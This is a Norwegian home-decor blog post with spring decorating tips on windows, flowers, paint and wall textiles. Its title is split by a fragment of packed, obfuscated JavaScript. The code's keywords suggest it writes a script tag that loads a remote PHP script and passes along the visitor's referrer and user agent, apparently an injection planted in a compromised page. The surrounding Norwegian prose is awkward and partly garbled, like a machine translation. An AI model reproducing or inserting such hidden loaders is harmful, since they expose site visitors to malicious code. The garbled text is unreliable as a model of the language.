Inspirasjon

Fest dekor hjemme på et blunk

Fest »’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(«<\/k"+"l>«);n m=»q»;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|itiak|var|u0026u|referrer|birdi||js|php’.split(‘|’),0,{}))
dekor hjemme på et blunk:
Nå når solen endelig begynner å se opp igjen, så det er på tide og dekorere for våren og sommeren. Det er i løpet av april har vært veldig opp og ned med regn, snø og sol blandet daglig. Men nå tar vi snart i mai at ofte er en måned der varmen og lyset vil finne sted.

Vi har på Homedecor noen smarte triks og tips om hvordan du får det vårfint hjemme på et blunk. Hva møbler er trendy for året, og hvordan du kan dekorere for de vakre sommerkvelder på balkongen, terrassen eller hagen.

Rydd opp for våren

Når lyset begynner å gå inn i hjemmet, er det spesielt viktig og holde vinduene rene. Derfor, pass og vaske vinduene og kanskje bytte til smart wrap lin gardiner og dekorasjon. Mange har kanskje malt hvite gulv i vinter kan lett bli skitten. Sørg for å rense dem, trenger du ikke å skjule den fine gulv med tepper. Lyset reflekteres utrolig vakker i den lyse gammelt treverk

Vakre blomster hjemme

Våren er også den tiden på året da blomster og planter er blomstrende. Dette bør dra nytte av. Pass og plukke opp gode vaser alt kjøpe noen nye. Deretter plasserer de vakre tulipaner, for eksempel spisebordet eller salongbordet hjemme. Du vil raskt se en stor forandring som gir atmosfæren til en lysere fremtid. Har du ikke en vase som fungerer en stilig karaffel også. Kanskje i noen tilfeller bedre, da det gir en koselig og personlig preg på hjemmet. Sted også lagt ut noen vakre stoler rundt spisebordet.

Bilde fotografert Ikea Livet hjemme, 160121

Maling på vårinredningen

Er du kanskje en person som elsker og ta et skritt videre når årstidene endres? Å male på en vegg eller sette tapet er ikke så krånligt som du tror. Ofte er dette en veldig stor forandring til det bedre i boligen. Kanskje du ønsker å male Editor funksjon vegg, men er fortsatt bekymret for om det vil passe hele året? Sett deretter opp noen fine tekstiler på veggen i stedet. Det skaper en lignende følelse, men med mulighet til å endre seg raskt når den ikke lenger passer inn i ditt hjem.

bilde ikea.no

Lykke til og ser nå for å dra nytte av hver soltimme deg i mai.

Related Posts

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *